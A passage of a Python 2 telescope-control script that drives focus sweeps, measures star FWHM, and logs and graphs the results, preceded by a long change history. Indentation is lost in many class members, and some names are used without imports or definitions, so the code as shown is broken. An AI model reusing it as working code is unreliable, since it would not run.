The user is expected to acquire a suitable star before resuming.
Once this phase begins (i.e. once you start the script)
changes to boresight offset are ignored.
Other imagers:
Take an exposure and look for the best centroidable star. Then pause.
The user is expected to acquire a suitable star before resuming.
2) Take the focus sweep.
Once this phase begins all inputs are ignored.
History:
2006-11-07 ROwen From DIS:Focus, which was from NICFPS:Focus.
2006-11-09 ROwen Removed use of plotAxis.autoscale_view(scalex=False, scaley=True)
since it was not compatible with older versions of matplotlib.
Stopped using float("nan") since it doesn't work on all pythons.
Modified to always pause before the focus sweep.
Modified to window the exposure.
2006-11-13 ROwen Modified to have user set center focus and range.
Added Expose and Sweep buttons.
2006-12-01 ROwen Refactored to make it easier to use for non-slitviewers:
- Added waitFocusSweep method.
- Modified to use focPosFWHMList instead of two lists.
Improved sanity-checking the best focus fit.
Created SlitviewerFocusScript and OffsetGuiderFocusScript classes;
the latter is not yet fully written.
2006-12-08 ROwen More refactoring. Created ImagerFocusScript class.
Needs extensive testing.
2006-12-13 ROwen Added Find button and changed Centroid to Measure.
Data is always nulled at start of sweep. This is much easier than
                    trying to figure out when I can safely keep existing data.
Fit error is logged.
Fit is logged and graphed even if fit is rejected (unless fit is a maximum).
Changed from Numeric to numarray to avoid a bug in matplotlib 0.87.7
Changed test for max fit focus error to a multiple of the focus range.
2006-12-28 ROwen Bug fix: tried to send <inst>Expose time=<time> bin=<binfac>
command for imaging instruments. The correct command is:
<inst>Expose object time=<time>.
Noted that bin factor and window must be configured via special
instrument-specific commands.
ImagerFocusScript no longer makes use of windowing (while centroiding),
though a subclass could do so.
2006-12-28 ROwen ImagerFocusScript.waitExpose now aborts the exposure if the script is aborted.
This change did not get into TUI 1.3a11. Note that this fix only applies to imaging
instruments; there is not yet any documented way to abort a guider exposure.
2007-01-02 ROwen Fixed a bug in waitExpose: <inst> <inst>Expose -> <instExpose>.
Fixed a bug in waitFindStar: centroidRad used but not supplied.
Improved help text for Star Pos entry widgets.
2007-01-03 ROwen Bug fixes:
- Used sr instead of self.sr in two places.
- ImagerFocusScript.getCentroidArgs returned bad
starpos due to wanting to window.
- ImagerFocusScript.waitCentroid failed if no star found
rather than returning sr.value = None.
2007-01-12 ROwen Added a threshold for star finding (maxFindAmpl).
Added logging of sky and star amplitude.
2007-01-26 ROwen Tweak various formats:
- All reported and command floats use %0.xf (some used %.xf).
- Focus is rounded to nearest integer for logging and setting.
If new focus found, set Center Focus to the new value.
Increased minimum # of focus positions from 2 to 3.
Bug fix: if only 3 measurements, divided by zero while computing std. dev.
Bug fix: could not restore initial focus (missing = in set focus command).
Minor bug fix: focus interval was computed as int, not float.
2007-01-29 ROwen Improved OffsetGuiderFocusScript to get guider info based on instPos
instead of insisting that the guider be the current instrument.
Modified to take advantage of RO.Wdg.Entry's new label attribute.
2007-01-29 ROwen Fixed ImagerFocusScript (it was giving an illegal arg to OffsetGuiderFocusScript).
Refactored so run is in BaseFocusScript and ImagerFocusScript inherits from that.
Renamed extraSetup method to waitExtraSetup.
2007-02-13 ROwen Added a Clear button.
Never auto-clears the log.
Waits to auto-clear the graph until new data is about to be graphed.
Simplified graph range handling.
2007-04-24 ROwen Modified to use numpy instead of numarray.
2007-06-01 ROwen Hacked in support for sfocus for SPIcam.
2007-06-04 ROwen Added doWindow argument to BaseFocusScript.
2007-07-25 ROwen ImagerFocusScript modified to sending windowing info as part of the expose command
if windowing is being used (due to improvements in spicamExpose).
Pings the gcam actor when it starts. This eliminates the situation where the actor
is dead and the script should halt, but keeps exposing and reporting fwhm=NaN instead.
2007-07-26 ROwen Added user-settable bin factor.
Modified to take a final exposure (after restoring boresight) if boresight moved.
2007-07-27 ROwen Increased the fidelity of debug mode and fixed some bugs.
2007-07-30 ROwen Added windowOrigin and windowIsInclusive arguments.
Bug fix: if the user changed the bin factor during script execution,
it would change the bin factor used in the script (and not necessarily properly).
2007-09-12 ROwen SlitviewerFocusScript bug fix: Cancel would fail if no image ever taken.
2007-12-20 ROwen Moved matplotlib configuration statements to TUI's startup because
in matplotlib 0.91.1 one may not call "use" after importing matplotlib.backends.
2008-01-24 ROwen BaseFocusScript bug fixes:
- PR 686: Find button broken (waitFindStar ran "expose" instead of "findstars"
and so never found anything.).
- recordUserParams didn't round window so relStarPos could be off by a fraction of a pixel.
2008-01-25 ROwen Added a digit after the decimal point for reporting fwhm in arcsec.
Implemented a lower limit on focus increment.
2008-02-01 ROwen Changed configuration constants from globals to class variables of BaseFocusScript
so subclasses can more easily override them.
Fixed debug mode to use proper defaults for number of steps and focus range.
Setting current focus successfully clears the status bar.
2008-03-28 ROwen PR 775: used exposeModel in classes where it did not exist.
Fixed by adding tccInstPrefix argument.
2008-04-02 ROwen PR 781: Many focus scripts fail to start with TypeError...:
BaseFocusScript.getInstInfo was missing () on a string method lower()
2008-04-22 ROwen Modified to use new Log.addMsg method.
2008-04-23 ROwen Added some diagnostic output for PR 777 and its kin.
2008-04-29 ROwen Open guide image window *after* checking for correct instrument.
2008-08-14 ROwen CR 818: take a final full-frame exposure if script windows
(or, as before, if boresight was restored).
2009-03-02 ROwen Added a brief header for PR 777 diagnostic output.
2010-03-12 ROwen Changed to use Models.getModel.
2015-11-03 ROwen Replace "== None" with "is None" and "!= None" with "is not None" to modernize the code.
"""
import inspect
import math
import random # for debug
import numpy
import Tkinter
import RO.Wdg
import RO.CnvUtil
import RO.Constants
import RO.StringUtil
import TUI.Models
import TUI.Inst.ExposeModel
import matplotlib
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
# display string for microns: the micro sign followed by "m"
MicronStr = RO.StringUtil.MuStr + "m"
def formatNum(val, fmt="%0.1f"):
    """Format *val* using the %-style format *fmt*.

    None is formatted as the string "NaN".
    Raise TypeError (with fmt and val in the message) if *fmt* rejects *val*.
    """
    if val is None:
        return "NaN"
    try:
        result = fmt % (val,)
    except TypeError:
        raise TypeError("formatNum failed on fmt=%r, val=%r" % (fmt, val))
    return result
class Extremes(object):
    """Track the minimum and maximum of a series of values.

    Inputs:
    - val: initial value, if any (None is ignored)

    Attributes minVal and maxVal are None until a value is added.
    """
    def __init__(self, val=None):
        self.minVal = None
        self.maxVal = None
        if val is not None:
            self.addVal(val)

    def addVal(self, val):
        """Add a value, updating minVal/maxVal; None is silently ignored."""
        if val is None:
            return
        if self.isOK():
            self.minVal = min(self.minVal, val)
            self.maxVal = max(self.maxVal, val)
        else:
            self.minVal = val
            self.maxVal = val

    def isOK(self):
        """Return True if at least one value has been added."""
        return self.minVal is not None

    def __eq__(self, other):
        return (self.minVal == other.minVal) and (self.maxVal == other.maxVal)

    def __ne__(self, other):
        # bug fix: Python 2 does not derive != from __eq__; without __ne__
        # the != operator compared object identity, contradicting __eq__
        return not self.__eq__(other)

    def __str__(self):
        return "[%s, %s]" % (self.minVal, self.maxVal)

    def __repr__(self):
        return "Extremes(%s, %s)" % (self.minVal, self.maxVal)
class StarMeas(object):
    """Holder for one star measurement.

    Attributes (any may be None):
    - xyPos: x, y centroid position (binned pixels)
    - sky: sky level (ADUs)
    - ampl: star amplitude (ADUs)
    - fwhm: FWHM (binned pixels)
    """
    def __init__(self,
        xyPos = None,
        sky = None,
        ampl = None,
        fwhm = None,
    ):
        self.xyPos = xyPos
        self.sky = sky
        self.ampl = ampl
        self.fwhm = fwhm

    @classmethod
    def fromStarKey(cls, starKeyData):
        """Create an instance from one entry of the guider star keyword data."""
        # field indices follow the guide camera "star" keyword layout
        return cls(
            xyPos = starKeyData[2:4],
            fwhm = starKeyData[8],
            sky = starKeyData[13],
            ampl = starKeyData[14],
        )
def makeStarData(
    typeChar = "f",
    xyPos = (10.0, 10.0),
    sky = 200,
    ampl = 1500,
    fwhm = 2.5,
):
    """Return a list containing one fake star-data entry for debug mode.

    The entry mimics the guider "star" keyword layout: position at
    indices 2-3, FWHM at 8-9, ampl at 12 and 14, sky at 13.
    """
    xPos, yPos = (float(val) for val in xyPos)
    fwhm = float(fwhm)
    entry = [typeChar, 1, xPos, yPos, 1.0, 1.0, fwhm * 5, 1, fwhm, fwhm, 0, 0, ampl, sky, ampl]
    return [entry]
class BaseFocusScript(object):
"""Basic focus script object.
This is a virtual base class. The inheritor must:
- Provide widgets
- Provide a "run" method
Inputs:
- gcamActor: name of guide camera actor (e.g. "dcam")
- instName: name of instrument (e.g. "DIS"); must be a name known to TUI.Inst.ExposeModel.
- tccInstPrefix: instrument name as known by the TCC; defaults to instName;
if the instrument has multiple names in the TCC then supply the common prefix
- imageViewerTLName: name of image viewer toplevel (e.g. "Guide.DIS Slitviewer")
- defRadius: default centroid radius, in arcsec
- defBinFactor: default bin factor; if None then bin factor cannot be set
- canSetStarPos: if True the user can set the star position;
if False then the Star Pos entries and Find button are not shown.
- maxFindAmpl: maximum star amplitude for finding stars (peak - sky in ADUs);
if None then star finding is disabled.
- doWindow: if True, subframe images during focus sequence
    - windowOrigin: index of left or lower pixel for window (0 or 1 unless very weird);
        this is not used for star positions, which all have the same convention
- windowIsInclusive: is the upper-right window coord included in the image?
- helpURL: URL of help file
- debug: if True, run in debug mode, which uses fake data and does not communicate with the hub.
"""
cmd_Find = "find"
cmd_Measure = "measure"
cmd_Sweep = "sweep"
# constants
#DefRadius = 5.0 # centroid radius, in arcsec
#NewStarRad = 2.0 # amount of star position change to be considered a new star
DefFocusNPos = 5 # number of focus positions
DefFocusRange = 200 # default focus range around current focus
FocusWaitMS = 1000 # time to wait after every focus adjustment (ms)
BacklashComp = 0 # amount of backlash compensation, in microns (0 for none)
WinSizeMult = 2.5 # window radius = centroid radius * WinSizeMult
FocGraphMargin = 5 # margin on graph for x axis limits, in um
MaxFocSigmaFac = 0.5 # maximum allowed sigma of best fit focus as a multiple of focus range
MinFocusIncr = 50 # minimum focus increment, in um
    def __init__(self,
        sr,
        gcamActor,
        instName,
        tccInstPrefix = None,
        imageViewerTLName = None,
        defRadius = 5.0,
        defBinFactor = 1,
        canSetStarPos = True,
        maxFindAmpl = None,
        doWindow = True,
        windowOrigin = 0,
        windowIsInclusive = True,
        helpURL = None,
        debug = False,
    ):
        """The setup script; run once when the script runner
        window is created.

        *sr* is the script runner; see the class docstring for the
        meaning of the remaining arguments.
        """
        self.sr = sr
        sr.debug = bool(debug)
        self.gcamActor = gcamActor
        self.instName = instName
        self.tccInstPrefix = tccInstPrefix or self.instName
        self.imageViewerTLName = imageViewerTLName
        # defBinFactor=None means the bin factor cannot be set; use 1 internally
        if defBinFactor is None:
            self.defBinFactor = None
            self.binFactor = 1
            self.dispBinFactor = 1
        else:
            self.defBinFactor = int(defBinFactor)
            self.binFactor = self.defBinFactor
            self.dispBinFactor = self.defBinFactor
        self.defRadius = defRadius
        self.helpURL = helpURL
        self.canSetStarPos = canSetStarPos
        self.maxFindAmpl = maxFindAmpl
        self.doWindow = bool(doWindow)
        self.windowOrigin = int(windowOrigin)
        self.windowIsInclusive = bool(windowIsInclusive)
        # fake data for debug mode
        self.debugIterFWHM = None
        # get various models
        self.tccModel = TUI.Models.getModel("tcc")
        self.tuiModel = TUI.Models.getModel("tui")
        self.guideModel = TUI.Models.getModel(self.gcamActor)
        # create and grid widgets; script-specific widgets come first
        self.gr = RO.Wdg.Gridder(sr.master, sticky="ew")
        self.createSpecialWdg()
        self.createStdWdg()
        self.initAll()
        # try to get focus away from graph (but it doesn't work; why?)
        self.expTimeWdg.focus_set()
        self.setCurrFocus()
    def createSpecialWdg(self):
        """Create script-specific widgets.

        Hook for subclasses; called from __init__ before createStdWdg,
        so subclass widgets appear above the standard ones.
        The base implementation does nothing.
        """
        pass
    def createStdWdg(self):
        """Create the standard widgets.

        Builds and grids, in order: exposure time, bin factor, star position,
        centroid radius, focus-sweep parameters, the measurement log (header +
        scrolling table), the FWHM-vs-focus graph and the command buttons.
        """
        sr = self.sr
        # --- exposure parameters ---
        self.expTimeWdg = RO.Wdg.FloatEntry(
            sr.master,
            label = "Exposure Time",
            minValue = self.guideModel.gcamInfo.minExpTime,
            maxValue = self.guideModel.gcamInfo.maxExpTime,
            defValue = self.guideModel.gcamInfo.defExpTime,
            defFormat = "%0.1f",
            defMenu = "Default",
            minMenu = "Minimum",
            helpText = "Exposure time",
            helpURL = self.helpURL,
        )
        self.gr.gridWdg(self.expTimeWdg.label, self.expTimeWdg, "sec")
        self.binFactorWdg = RO.Wdg.IntEntry(
            master = sr.master,
            label = "Bin Factor",
            minValue = 1,
            maxValue = 1024,
            defValue = self.defBinFactor or 1,
            defMenu = "Default",
            callFunc = self.updBinFactor,
            helpText = "Bin factor (for rows and columns)",
            helpURL = self.helpURL,
        )
        # only show the bin factor control when the bin factor may be set
        if self.defBinFactor is not None:
            self.gr.gridWdg(self.binFactorWdg.label, self.binFactorWdg)
        # --- star position and centroid radius ---
        self.starPosWdgSet = []
        for ii in range(2):
            letter = ("X", "Y")[ii]
            starPosWdg = RO.Wdg.FloatEntry(
                master = sr.master,
                label = "Star Pos %s" % (letter,),
                minValue = 0,
                maxValue = 5000,
                helpText = "Star %s position (binned, full frame)" % (letter,),
                helpURL = self.helpURL,
            )
            if self.canSetStarPos:
                self.gr.gridWdg(starPosWdg.label, starPosWdg, "pix")
            self.starPosWdgSet.append(starPosWdg)
        self.centroidRadWdg = RO.Wdg.IntEntry(
            master = sr.master,
            label = "Centroid Radius",
            minValue = 5,
            maxValue = 1024,
            defValue = self.defRadius,
            defMenu = "Default",
            helpText = "Centroid radius; don't skimp",
            helpURL = self.helpURL,
        )
        self.gr.gridWdg(self.centroidRadWdg.label, self.centroidRadWdg, "arcsec", sticky="ew")
        # --- focus sweep parameters ---
        setCurrFocusWdg = RO.Wdg.Button(
            master = sr.master,
            text = "Center Focus",
            callFunc = self.setCurrFocus,
            helpText = "Set to current focus",
            helpURL = self.helpURL,
        )
        self.centerFocPosWdg = RO.Wdg.IntEntry(
            master = sr.master,
            label = "Center Focus",
            defValue = 0,
            defMenu = "Default",
            helpText = "Center of focus sweep",
            helpURL = self.helpURL,
        )
        self.gr.gridWdg(setCurrFocusWdg, self.centerFocPosWdg, MicronStr)
        self.focusRangeWdg = RO.Wdg.IntEntry(
            master = sr.master,
            label = "Focus Range",
            maxValue = self.DefFocusRange * 10,
            defValue = self.DefFocusRange,
            defMenu = "Default",
            helpText = "Range of focus sweep",
            helpURL = self.helpURL,
        )
        self.gr.gridWdg(self.focusRangeWdg.label, self.focusRangeWdg, MicronStr)
        self.numFocusPosWdg = RO.Wdg.IntEntry(
            master = sr.master,
            label = "Focus Positions",
            minValue = 3,
            defValue = self.DefFocusNPos,
            defMenu = "Default",
            helpText = "Number of focus positions for sweep",
            helpURL = self.helpURL,
        )
        self.gr.gridWdg(self.numFocusPosWdg.label, self.numFocusPosWdg, "")
        # read-only display of the step size implied by range and # of positions
        self.focusIncrWdg = RO.Wdg.FloatEntry(
            master = sr.master,
            label = "Focus Increment",
            defFormat = "%0.1f",
            readOnly = True,
            relief = "flat",
            helpText = "Focus step size; must be at least %s %s" % (self.MinFocusIncr, MicronStr),
            helpURL = self.helpURL,
        )
        self.gr.gridWdg(self.focusIncrWdg.label, self.focusIncrWdg, MicronStr)
        # create the move to best focus checkbox
        self.moveBestFocus = RO.Wdg.Checkbutton(
            master = sr.master,
            text = "Move to Best Focus",
            defValue = True,
            relief = "flat",
            helpText = "Move to estimated best focus and measure FWHM after sweep?",
            helpURL = self.helpURL,
        )
        self.gr.gridWdg(None, self.moveBestFocus, colSpan = 3, sticky="w")
        graphCol = self.gr.getNextCol()
        graphRowSpan = self.gr.getNextRow()
        # table of measurements (including separate unscrolled header)
        TableWidth = 32
        self.logHeader = RO.Wdg.Text(
            master = sr.master,
            readOnly = True,
            height = 2,
            width = TableWidth,
            helpText = "Measured and fit results",
            helpURL = self.helpURL,
            relief = "sunken",
            bd = 0,
        )
        self.logHeader.insert("0.0", """\tfocus\tFWHM\tFWHM\tsky\tampl\tsky+ampl
\t%s\tpixels\tarcsec\tADUs\tADUs\tADUs""" % MicronStr)
        self.logHeader.setEnable(False)
        self.gr.gridWdg(False, self.logHeader, sticky="ew", colSpan = 10)
        self.logWdg = RO.Wdg.LogWdg(
            master = sr.master,
            height = 10,
            width = TableWidth,
            helpText = "Measured and fit results",
            helpURL = self.helpURL,
            relief = "sunken",
            bd = 2,
        )
        self.gr.gridWdg(False, self.logWdg, sticky="ew", colSpan = 10)
        # graph of measurements
        plotFig = matplotlib.figure.Figure(figsize=(4, 1), frameon=True)
        self.figCanvas = FigureCanvasTkAgg(plotFig, sr.master)
        self.figCanvas.get_tk_widget().grid(row=0, column=graphCol, rowspan=graphRowSpan, sticky="news")
        self.plotAxis = plotFig.add_subplot(1, 1, 1)
        # keep the displayed focus increment up to date
        self.focusRangeWdg.addCallback(self.updFocusIncr, callNow=False)
        self.numFocusPosWdg.addCallback(self.updFocusIncr, callNow=True)
        # add command buttons
        cmdBtnFrame = Tkinter.Frame(sr.master)
        self.findBtn = RO.Wdg.Button(
            master = cmdBtnFrame,
            text = "Find",
            callFunc = RO.Alg.GenericCallback(self.doCmd, self.cmd_Find),
            helpText = "Update focus, expose and find best star",
            helpURL = self.helpURL,
        )
        # Find is only shown when star finding is enabled (maxFindAmpl set)
        if self.maxFindAmpl is not None:
            self.findBtn.pack(side="left")
        self.measureBtn = RO.Wdg.Button(
            master = cmdBtnFrame,
            text = "Measure",
            callFunc = RO.Alg.GenericCallback(self.doCmd, self.cmd_Measure),
            helpText = "Update focus, expose and measure FWHM",
            helpURL = self.helpURL,
        )
        self.measureBtn.pack(side="left")
        self.sweepBtn = RO.Wdg.Button(
            master = cmdBtnFrame,
            text = "Sweep",
            callFunc = RO.Alg.GenericCallback(self.doCmd, self.cmd_Sweep),
            helpText = "Start focus sweep",
            helpURL = self.helpURL,
        )
        self.sweepBtn.pack(side="left")
        self.clearBtn = RO.Wdg.Button(
            master = cmdBtnFrame,
            text = "Clear",
            callFunc = self.doClear,
            helpText = "Clear table and graph",
            helpURL = self.helpURL,
        )
        self.clearBtn.pack(side="right")
        nCol = self.gr.getMaxNextCol()
        self.gr.gridWdg(False, cmdBtnFrame, colSpan=nCol)
        # convenient defaults for debug mode
        if sr.debug:
            self.expTimeWdg.set("1")
            self.centerFocPosWdg.set(0)
    def clearGraph(self):
        """Clear the FWHM-vs-focus graph and forget the plotted line."""
        self.plotAxis.clear()
        self.plotAxis.grid(True)
        # start with autoscale disabled due to bug in matplotlib
        self.plotAxis.set_autoscale_on(False)
        self.figCanvas.draw()
        self.plotLine = None
    def doClear(self, wdg=None):
        """Clear the log table and the graph (callback for the Clear button).

        *wdg* is ignored; it is present for the button callback signature.
        """
        self.logWdg.clearOutput()
        self.clearGraph()
def doCmd(self, cmdMode, wdg=None):
if cmdMode not in (
self.cmd_Measure,
self.cmd_Find,
self.cmd_Sweep,
):
raise self.sr.RuntimeError("Unknown command mode %r" % (cmdMode,))
self.cmdMode = cmdMode
self.sr.resumeUser()
def enableCmdBtns(self, doEnable):
"""Enable or disable command buttons (e.g. Expose and Sweep).
"""
self.findBtn.setEnable(doEnable)
self.measureBtn.setEnable(doEnable)
self.sweepBtn.setEnable(doEnable)
self.clearBtn.setEnable(doEnable)
    def end(self, sr):
        """Run when script exits (normally or due to error)

        Cleanup: restore the original focus and boresight (if they were
        changed) and start a final full-frame exposure if one is warranted.
        """
        self.enableCmdBtns(False)
        # restore the focus the sweep started from, if one was recorded
        if self.focPosToRestore is not None:
            tccCmdStr = "set focus=%0.0f" % (self.focPosToRestore,)
            if self.sr.debug:
                print "end is restoring the focus: %r" % tccCmdStr
            sr.startCmd(
                actor = "tcc",
                cmdStr = tccCmdStr,
            )
        doRestoreBoresight = self.begBoreXYDeg != self.currBoreXYDeg
        if doRestoreBoresight:
            if self.sr.debug:
                print "end is restoring the boresight"
            # NOTE: moveBoresight is defined elsewhere (not visible here)
            self.moveBoresight(
                self.begBoreXYDeg,
                doWait = False,
            )
        # take a final full-frame image if the script windowed its exposures
        # or moved the boresight (run() clears didTakeImage when it already
        # took this final image itself)
        if self.didTakeImage and (self.doWindow or doRestoreBoresight):
            if self.sr.debug:
                print "end is taking a final exposure"
            exposeCmdDict = self.getExposeCmdDict(doWindow=False)
            sr.startCmd(**exposeCmdDict)
def formatBinFactorArg(self):
"""Return bin factor argument for expose/centroid/findstars command"""
#print "defBinFactor=%r, binFactor=%r" % (self.defBinFactor, self.binFactor)
# if defBinFactor None then bin factor cannot be set
if self.defBinFactor is None:
return ""
return "bin=%d" % (self.binFactor,)
def formatExposeArgs(self, doWindow=True):
"""Format arguments for exposure command.
Inputs:
- doWindow: if true, window the exposure (if permitted)
"""
argList = [
"time=%s" % (self.expTime,),
self.formatBinFactorArg(),
self.formatWindowArg(doWindow),
]
argList = [arg for arg in argList if arg]
return " ".join(argList)
def formatWindowArg(self, doWindow=True):
"""Format window argument for expose/centroid/findstars command.
Inputs:
- doWindow: if true, window the exposure (if permitted)
"""
if not doWindow or not self.doWindow:
return ""
if self.windowIsInclusive:
urOffset = self.windowOrigin
else:
urOffset = self.windowOrigin + 1
windowLL = [self.window[ii] + self.windowOrigin for ii in range(2)]
windowUR = [self.window[ii+2] + urOffset for ii in range(2)]
return "window=%d,%d,%d,%d" % (windowLL[0], windowLL[1], windowUR[0], windowUR[1])
    def getInstInfo(self):
        """Obtains instrument data.

        Verifies the correct instrument and sets these attributes:
        - instScale: x,y image scale in unbinned pixels/degree
        - instCtr: x,y image center in unbinned pixels
        - instLim: xmin, ymin, xmax, ymax image limits, inclusive, in unbinned pixels
        - arcsecPerPixel: image scale in arcsec/unbinned pixel;
            average of x and y scales

        Raises ScriptError if wrong instrument.
        """
        sr = self.sr
        if self.tccInstPrefix and not sr.debug:
            # Make sure current instrument is correct
            try:
                currInstName = sr.getKeyVar(self.tccModel.inst)
            except sr.ScriptError:
                raise sr.ScriptError("current instrument unknown")
            if not currInstName.lower().startswith(self.tccInstPrefix.lower()):
                raise sr.ScriptError("%s is not the current instrument (%s)!" % (self.instName, currInstName))
            self.instScale = sr.getKeyVar(self.tccModel.iimScale, ind=None)
            self.instCtr = sr.getKeyVar(self.tccModel.iimCtr, ind=None)
            self.instLim = sr.getKeyVar(self.tccModel.iimLim, ind=None)
        else:
            # canned values for debug mode:
            # data from tcc tinst:I_NA2_DIS.DAT 18-OCT-2006
            self.instScale = [-12066.6, 12090.5] # unbinned pixels/deg
            self.instCtr = [240, 224]
            self.instLim = [0, 0, 524, 511]
        # mean of |x| and |y| scales, converted from deg to arcsec
        self.arcsecPerPixel = 3600.0 * 2 / (abs(self.instScale[0]) + abs(self.instScale[1]))
def getEntryNum(self, wdg):
"""Return the numeric value of a widget, or raise ScriptError if blank.
"""
numVal = wdg.getNumOrNone()
if numVal is not None:
return numVal
raise self.sr.ScriptError(wdg.label + " not specified")
def getExposeCmdDict(self, doWindow=True):
"""Get basic command arument dict for an expose command
This includes actor, cmdStr, abortCmdStr
"""
return dict(
actor = self.gcamActor,
cmdStr = "expose " + self.formatExposeArgs(doWindow),
abortCmdStr = "abort",
)
    def graphFocusMeas(self, focPosFWHMList, extremeFocPos=None, extremeFWHM=None):
        """Graph measured fwhm vs focus.

        Inputs:
        - focPosFWHMList: list of data items:
            - focus position (um)
            - measured FWHM (binned pixels)
        - extremeFocPos: extremes of focus position (an Extremes object)
        - extremeFWHM: extremes of FWHM (an Extremes object)

        Does nothing if focPosFWHMList is empty.
        """
        # "graphFocusMeas(focPosFWHMList=%s, extremeFocPos=%r, extremeFWHM=%r)" % (focPosFWHMList, extremeFocPos, extremeFWHM)
        numMeas = len(focPosFWHMList)
        if numMeas == 0:
            return
        focList, fwhmList = zip(*focPosFWHMList)
        # create the line on first use; just update its data thereafter
        if not self.plotLine:
            self.plotLine = self.plotAxis.plot(focList, fwhmList, 'bo')[0]
        else:
            self.plotLine.set_data(focList[:], fwhmList[:])
        self.setGraphRange(extremeFocPos=extremeFocPos, extremeFWHM=extremeFWHM)
    def initAll(self):
        """Initialize variables, table and graph.
        """
        # initialize shared variables
        self.didTakeImage = False # set True once any exposure has been taken
        self.focDir = None
        self.currBoreXYDeg = None
        self.begBoreXYDeg = None
        self.instScale = None
        self.arcsecPerPixel = None
        self.instCtr = None
        self.instLim = None
        self.cmdMode = None
        self.focPosToRestore = None
        self.expTime = None
        self.absStarPos = None
        self.relStarPos = None
        self.binFactor = None
        self.window = None # LL pixel is 0, UL pixel is included
        # buttons stay disabled until run() is waiting for user input
        self.enableCmdBtns(False)
def logFitFWHM(self, name, focPos, fwhm):
"""Log a fit value of FWHM or FWHM error.
"""
if fwhm is not None:
fwhmArcSec = fwhm * self.arcsecPerPixel * self.binFactor
else:
fwhmArcSec = None
dataStrs = (
formatNum(focPos, "%0.0f"),
formatNum(fwhm, "%0.1f"),
formatNum(fwhmArcSec, "%0.2f"),
)
outStr = "%s\t%s" % (name, "\t".join(dataStrs))
self.logWdg.addMsg(outStr)
def logStarMeas(self, name, focPos, starMeas):
"""Log a star measurement.
The name should be less than 8 characters long.
Any or all data fields in starMeas may be None.
Inputs:
- focPos: focus position, in um
- starMeas: StarMeas object
If fwhm is None, it is reported as NaN.
"""
fwhm = starMeas.fwhm
if fwhm is not None:
fwhmArcSec = fwhm * self.arcsecPerPixel * self.binFactor
else:
fwhmArcSec = None
if None not in (starMeas.ampl, starMeas.sky):
skyPlusAmpl = starMeas.ampl + starMeas.sky
else:
skyPlusAmpl = None
dataStrs = (
formatNum(focPos, "%0.0f"),
formatNum(fwhm, "%0.1f"),
formatNum(fwhmArcSec, "%0.2f"),
formatNum(starMeas.sky, "%0.0f"),
formatNum(starMeas.ampl, "%0.0f"),
formatNum(skyPlusAmpl, "%0.0f"),
)
outStr = "%s\t%s" % (name, "\t".join(dataStrs))
self.logWdg.addMsg(outStr)
    def recordUserParams(self, doStarPos=True):
        """Record user-set parameters relating to exposures but not to focus

        Inputs:
        - doStarPos: if true: save star position and related information;
            warning: if doStarPos true then there must *be* a valid star position

        Set the following instance variables:
        - expTime
        - centroidRadPix
        The following are set to None if doStarPos false:
        - absStarPos
        - relStarPos
        - window
        """
        self.expTime = self.getEntryNum(self.expTimeWdg)
        self.binFactor = self.dispBinFactor
        centroidRadArcSec = self.getEntryNum(self.centroidRadWdg)
        # convert centroid radius from arcsec to binned pixels
        self.centroidRadPix = centroidRadArcSec / (self.arcsecPerPixel * self.binFactor)
        if doStarPos:
            winRad = self.centroidRadPix * self.WinSizeMult
            self.absStarPos = [None, None]
            for ii in range(2):
                wdg = self.starPosWdgSet[ii]
                self.absStarPos[ii] = self.getEntryNum(wdg)
            if self.doWindow:
                # round the window and clip it to the instrument limits;
                # relStarPos is the star position relative to the window origin
                windowMinXY = [max(self.instLim[ii], int(0.5 + self.absStarPos[ii] - winRad)) for ii in range(2)]
                windowMaxXY = [min(self.instLim[ii-2], int(0.5 + self.absStarPos[ii] + winRad)) for ii in range(2)]
                self.window = windowMinXY + windowMaxXY
                self.relStarPos = [self.absStarPos[ii] - windowMinXY[ii] for ii in range(2)]
                #print "winRad=%s, windowMinXY=%s, relStarPos=%s" % (winRad, windowMinXY, self.relStarPos)
            else:
                self.window = None
                self.relStarPos = self.absStarPos[:]
        else:
            self.absStarPos = None
            self.relStarPos = None
            self.window = None
    def run(self, sr):
        """Run the focus script.

        Phase 1: repeatedly let the user Find or Measure a star while
        acquiring a suitable target. Phase 2: once Sweep is pressed, run the
        focus sweep, then restore the boresight and take a final full-frame
        image when needed.
        """
        self.initAll()
        # fake data for debug mode
        # iteration #, FWHM
        self.debugIterFWHM = (1, 2.0)
        self.getInstInfo()
        yield self.waitExtraSetup()
        # open image viewer window, if any
        if self.imageViewerTLName:
            self.tuiModel.tlSet.makeVisible(self.imageViewerTLName)
        self.sr.master.winfo_toplevel().lift()
        focPosFWHMList = []
        extremeFocPos = Extremes()
        extremeFWHM = Extremes()
        # check that the gcam actor is alive. This is important because
        # centroid commands can fail due to no actor or no star
        # so we want to halt in the former case
        yield sr.waitCmd(
            actor = self.gcamActor,
            cmdStr = "ping",
        )
        # command loop; repeat until error or user explicitly presses Stop
        if self.maxFindAmpl is None:
            btnStr = "Measure or Sweep"
        else:
            btnStr = "Find, Measure or Sweep"
        waitMsg = "Press %s to continue" % (btnStr,)
        testNum = 0
        while True:
            # wait for user to press the Expose or Sweep button
            # note: the only time they should be enabled is during this wait
            self.enableCmdBtns(True)
            sr.showMsg(waitMsg, RO.Constants.sevWarning)
            yield sr.waitUser()
            self.enableCmdBtns(False)
            if self.cmdMode == self.cmd_Sweep:
                break
            if testNum == 0:
                self.clearGraph()
                if self.maxFindAmpl is None:
                    self.logWdg.addMsg("===== Measure =====")
                else:
                    self.logWdg.addMsg("===== Find/Measure =====")
            testNum += 1
            # NOTE(review): float(...) never returns None, so the check below
            # is dead; a blank entry raises ValueError, not the friendly
            # ScriptError — confirm and consider using getNumOrNone instead
            focPos = float(self.centerFocPosWdg.get())
            if focPos is None:
                raise sr.ScriptError("must specify center focus")
            yield self.waitSetFocus(focPos, False)
            if self.cmdMode == self.cmd_Measure:
                cmdName = "Meas"
                self.recordUserParams(doStarPos=True)
                yield self.waitCentroid()
            elif self.cmdMode == self.cmd_Find:
                cmdName = "Find"
                self.recordUserParams(doStarPos=False)
                yield self.waitFindStar()
                starData = sr.value
                if starData.xyPos is not None:
                    sr.showMsg("Found star at %0.1f, %0.1f" % tuple(starData.xyPos))
                    self.setStarPos(starData.xyPos)
            else:
                raise RuntimeError("Unknown command mode: %r" % (self.cmdMode,))
            starMeas = sr.value
            self.logStarMeas("%s %d" % (cmdName, testNum,), focPos, starMeas)
            fwhm = starMeas.fwhm
            if fwhm is None:
                waitMsg = "No star found! Fix and then press %s" % (btnStr,)
                self.setGraphRange(extremeFocPos=extremeFocPos)
            else:
                extremeFocPos.addVal(focPos)
